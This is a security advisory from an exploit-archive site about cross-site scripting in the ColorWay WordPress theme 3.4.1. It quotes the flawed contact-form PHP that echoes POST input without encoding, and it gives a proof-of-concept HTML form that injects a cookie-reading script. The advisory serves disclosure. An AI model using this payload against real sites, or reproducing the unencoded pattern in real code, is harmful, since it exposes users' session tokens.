exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress ColorWay 3.4.1 Cross Site Scripting

WordPress ColorWay 3.4.1 Cross Site Scripting
Posted Jul 27, 2016
Authored by Yorick Koster, Securify B.V.

WordPress ColorWay theme version 3.4.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 3bcf6e430117f011bfa6bd3a2b25554032fd79f8c9f5f3d375c6a42284fe8437

WordPress ColorWay 3.4.1 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in ColorWay WordPress Theme
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Multiple Cross-Site Scripting vulnerabilities were found in the ColorWay
WordPress Theme. These issues allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0024

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on ColorWay WordPress Theme
version 3.4.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in ColorWay WordPress Theme version 3.4.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html

These issues exists due to the lack of output encoding of user input. An example can be seen in the file contact.php. Several POST parameters are using in the output without applying proper encoding.

<form action="<?php the_permalink(); ?>" id="contactForm" method="post">
<ul class="contactform">
<li>
<label for="contactName"><?php _e('Name:', 'colorway'); ?></label>
<input type="text" name="contactName" id="contactName" value="<?php if (isset($_POST['contactName'])) echo $_POST['contactName']; ?>" class="required requiredField" />
<?php if ($nameError != '') { ?>
<span class="error"> <?php echo $nameError; ?> </span>
<?php } ?>
</li>
<li>
<label for="email"><?php _e('Email', 'colorway'); ?></label>
<input type="text" name="email" id="email" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" class="required requiredField email" />
<?php if ($emailError != '') { ?>
<span class="error"> <?php echo $emailError; ?> </span>
<?php } ?>
</li>
<li>
<label for="commentsText"><?php _e('Message:', 'colorway'); ?></label>
<textarea name="comments" id="commentsText" rows="20" cols="30" class="required requiredField"><?php
if (isset($_POST['comments'])) {
if (function_exists('stripslashes')) {
echo stripslashes($_POST['comments']);
} else {
echo $_POST['comments'];
}
}
?>
</textarea>
<?php if ($commentError != '') { ?>
<span class="error"> <?php echo $commentError; ?> </span>
<?php } ?>
</li>
<li>
<input type="submit" value="<?php _e('Send Email', 'colorway'); ?>"/>
</li>
</ul>
<input type="hidden" name="submitted" id="submitted" value="true" />
</form>

Proof of concept

<html>
<body>
<form action="http://<target>/contact/" method="POST">
<input type="hidden" name="contactName" value=""><script>alert(document.cookie);</script>" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="comments" value=" " />
<input type="hidden" name="submitted" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close